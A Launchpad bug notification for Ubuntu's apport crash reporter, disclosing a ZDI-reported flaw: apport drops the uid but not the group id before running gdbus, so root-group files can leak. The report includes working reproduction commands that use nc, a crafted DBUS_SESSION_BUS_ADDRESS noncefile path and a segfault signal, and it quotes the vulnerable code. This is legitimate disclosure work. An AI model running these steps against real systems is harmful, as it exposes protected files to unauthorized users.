** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1885633
Title:
[ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure
Vulnerability
Status in apport package in Ubuntu:
Fix Released
Status in apport source package in Xenial:
Fix Released
Status in apport source package in Bionic:
Fix Released
Status in apport source package in Eoan:
Confirmed
Status in apport source package in Focal:
Fix Released
Bug description:
-- VULNERABILITY DETAILS ------------------------
* Version tested:18.04.4 LTS amd64 server
* Installer file:ubuntu-18.04.4-live-server-amd64.iso
* Platform tested:-
---
### Analysis
Apport which is crash reporter in Ubuntu will execute gdbus to check if pid is in a closing user session. Before executing the binary, it drop privilege to crashed process's uid. But it doesn't drop group id, so it can be used to leak file which is owned by root group.
It leads to anyone can read the file which can only be read by root group, but the file size must be 16bytes.
reproduce step
```
ubuntu at ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu at ubuntu:/tmp$ sudo chown root:root securefile
ubuntu at ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu at ubuntu:/tmp$ su - zdi
Password:
zdi at ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi at ubuntu:~$ cd /tmp/
zdi at ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi at ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi at ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi at ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 &
[2] 2036
zdi at ubuntu:/tmp$ kill -11 2036
zdi at ubuntu:/tmp$ SECURESECRETHEREAUTH
zdi at ubuntu:/tmp$
```
~~~C++
orig_uid = os.geteuid()
os.setresuid(-1, os.getuid(), -1) <-- did not set gid
try:
gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',
'org.gnome.SessionManager', '-o', '/org/gnome/SessionManager', '-m',
'org.gnome.SessionManager.IsSessionRunning'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})
(out, err) = gdbus.communicate()
if err:
error_log('gdbus call error: ' + err.decode('UTF-8'))
except OSError as e:
error_log('gdbus call failed, cannot determine running session: ' + str(e))
return False
finally:
os.setresuid(-1, orig_uid, -1)
~~~
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
Ryota Shiga(@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1885633/+subscriptions